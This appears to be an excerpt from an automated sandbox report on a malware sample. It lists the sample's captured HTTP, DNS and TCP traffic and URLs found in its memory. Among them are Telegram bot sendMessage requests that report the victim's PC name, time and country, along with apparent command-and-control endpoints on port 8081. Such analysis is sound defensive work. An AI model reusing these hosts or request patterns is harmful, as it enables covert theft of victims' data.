Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49757 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49827 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20and%20Time:%2022/02/2025%20/%2014:41:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745481%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20and%20Time:%2022/02/2025%20/%2013:03:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745481%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20and%20Time:%2022/02/2025%20/%2015:52:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745481%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 22 Feb 2025 07:08:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 22 Feb 2025 07:08:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 22 Feb 2025 07:09:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PWSW6GK3ZC.exe, 00000000.00000003.2101681572.000000007F0E0000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2137266284.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2101413856.000000007F0EF000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2139172648.00000000213B9000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000003.2101681572.000000007F126000.00000004.00001000.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2137266284.0000000021112000.00000004.00000020.00020000.00000000.sdmp, PWSW6GK3ZC.exe, 00000000.00000002.2137466708.00000000211AA000.00000004.00001000.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3358783454.0000000000436000.00000040.00000400.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000000.2116558483.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Qzlvenpf.PIF, 00000009.00000002.2238726030.0000000002919000.00000004.00001000.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000000.2235739576.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Qzlvenpf.PIF, 0000000C.00000002.2339421815.0000000020889000.00000004.00001000.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000000.2319507022.0000000000416000.00000002.00000001.01000000.00000006.sdmp, fpnevlzQ.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB14000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB14000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F304000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 